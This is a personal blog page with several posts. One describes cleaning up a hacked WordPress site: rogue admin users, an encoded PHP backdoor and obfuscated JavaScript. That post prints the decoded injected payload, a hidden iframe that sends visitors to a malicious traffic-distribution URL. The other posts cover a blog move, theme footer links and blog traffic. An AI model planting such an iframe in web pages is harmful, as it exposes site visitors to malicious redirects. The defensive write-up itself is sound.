Dhivael/Anne’s Hyperactive Blog

(I think.)

I had reason to go searching for something in my blog this morning. In the process, I found out my blog had been hacked to redirect people away. Guess that’s what I get for not paying attention. I could’ve sworn that I’d upgraded… but apparently not.

Of course, I freaked.

Some digging around produced a helpful link or two or three regarding what to do.

After reading through the instructions, I prepared for hours worth of removing junk from my site. After downloading the entire blog as well as a backup of my SQL DB, I found… nothing. Well, almost nothing. The hack consisted of:

1. 6 or 7 unauthorized users, one of which was an admin.
2. Some obfuscated Javascript in the header.php of my theme.
3. A randomly named PHP file in my upload directory.

Things were, clearly, better than I thought. Despite the dire predictions of others, this was fairly simple to fix.

1. Upgrade! I thought I had before, obviously not. But I upgraded now.
2. Delete those unauthorized users.
3. Delete the “845530.php” file in my upload directory.
4. Delete the offending Javascript in my header.php file.

After doing this, I was left with an obfuscated PHP file and Javascript. So, of course, I decided to decrypt them.

The PHP file was easy. Two times through base64_decode() produced readable code. The offending file is pretty long, so I’m not sure precisely what it does, but there are a few interesting points. There are a few lines that seem to allow the hacker to download and email themselves your SQL DB. This is, no doubt, why you’re advised to change your password after getting hacked. It also likely helps your server function as a “relay” station for the Javascript. As such, it’s absolutely necessary that you find and delete this ASAP.

The Javascript proved a bit trickier. It was encoded differently and it took me awhile to figure out how to get it, and then that was only after help and a nudge in the right direction. It proved to be code that would write the following to your page:

<iframe src=’http://itsallbreaksoft.net/tds/in.cgi?3&seoref=” encodeURIComponent(document.referrer) “&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=” encodeURIComponent(document.URL) “&default_keyword=notdefine’ width=1 height=1 border=0 frameborder=0></iframe>

After Googling for itsallbreaksoft.net, this turned out to be a known “bad site”.

Strangely enough, none of the sites make mention of the obfuscated PHP file, although I’m fairly certain it’s all part of the same exploit.

Okay, maybe not really… But if it wasn’t enough that I moved my blog to a new address, I’ve gone and decided to port my old main site over to Joomla. I’d considered making it WordPress, but WordPress isn’t quite what I want in this instance.

Joomla is a bit unwieldy, but it should be good for a few things I have in mind. Once I figure out how to do them. And after I get everything ported over to it. Shouldn’t take too long…

In my bid to redirect everyone here from the old /blog address, I didn’t realize I had forgotten to redirect the main blog page as well. At least, until someone pointed out that my blog was ‘gone’. So I’ve gotten that fixed and I think that the move is officially complete now.

So I’ve moved everything over to blog.annelions.com, as you can probably see if you’re reading this. Some images and stuff still point to the old blog address and I’m working now on correcting them. Shouldn’t notice anything major right now, though, except a few missing images. Working on getting that all fixed ASAP.

I am so tired of searching for a WordPress template and finding one that is perfect only to download it and discover that the stupid thing is encrypted somehow. The footer links invariably end up being:

• Irrelevant. I highly doubt that a business card company actually designed the theme. Nor does my site have anything to do with business cards (so it’s not going to help their PR by that much, as far as I know.
• Outdated. The sites are completely dead and have been for some time.
• Objectionable. Gambling and ‘adult’ sites. These are somewhat rarer, but I still have no wish to link to either.

I’m usually willing to leave in a link if the footer’s not obfuscated in some way, but otherwise I either will fix it (unencrypt and remove the links) or simply not use the template. I know a lot of other people are getting tired of this and removing the encryption from their templates as well.

So, if you’re thinking of buying ‘advertising’ in the footer of a WP template (‘sponsoring’ a template), you’re just wasting your money. If you’re selling ‘advertising’, you’re scum.

I have no problems paying $5-10 for a decent template, which would give the creators about the same amount of money as they get now. I have no wish, however, to be unable to edit my template easily and to have stupid links at the bottom.S

Install a blog. Seriously.

You don’t even have to update it daily. Google and other search engines honestly do not care that much. How do I know this?

I have a certain domain that I’ve held for… hmmm… about 6 years, give or take. If you go look at Archive.org, it’s gone through many iterations. Some are now rather embarrassing; for awhile the site was hosted for free on ‘Marhost’, though I don’t remember details. ‘Wigloo’ and Tripod have also been used before finally moving to a ‘semi-paid’ host and then finally here.

Anyway, I finally moved it to the current host about 2 years ago. Since then, it didn’t get much traffic. Some, but not much. 10-20 visitors a MONTH average, 60 for a high point. So not much traffic at all. At least, not until I decided to scrap the way things were and install WordPress for my own ease of updating. I added a few posts and then forgot about it, having other important things come up.

That was 6 months ago. I remembered a few days ago to check the webstats and found that I’ve been getting 130-180 visitors a month since then. This may seem like very little, but remember… I did NOTHING with the site for six months. Zip. Zilch. No new content. NOTHING. And yet I’ve seen a 2-3x increase in visitors.

When my page was pure HTML, I’d get a handful of searches for various keywords; maybe 10 searches a month. Nothing important, mostly just rarer stuff that’s hard to find elsewhere. Now that I have WordPress installed, I have been getting a lot more hits for more general words. Apparently, I rank somewhat highly somewhere for the word ‘boldly’ (and other generic words). Even if it’s buried on the third or fourth page of the search, that’s pretty darn impressive because:

1. I’ve done no search engine optimization. Beyond installing WordPress’s permalinks, I’ve done nothing to try to get search engines to visit.
2. Even if I had done SEO, ‘boldly’ is not a keyword/phrase I would have chosen. Google reports about 9 million results for ‘boldly’. And I’m getting hits for it? How cool is that!
3. I’ve done absolutely no advertising or posting of links for this site anywhere in the past 6 months.
4. The blog had been sitting dormant for nearly six months. No updates, not even automatic ones. Yet I’m still getting way more traffic with it than I ever got with plain HTML pages.

To me, the evidence is irrefutable: search engines love blogs. Before, I was skeptical that it’d do much. But it’s hard to deny 18 months of stats as a plain, irregularly updated, HTML site + 6 months as a never-updated blog.

Now, while you may not see as dramatic an increase as 2-3x your current traffic, it still seems worth giving it a shot.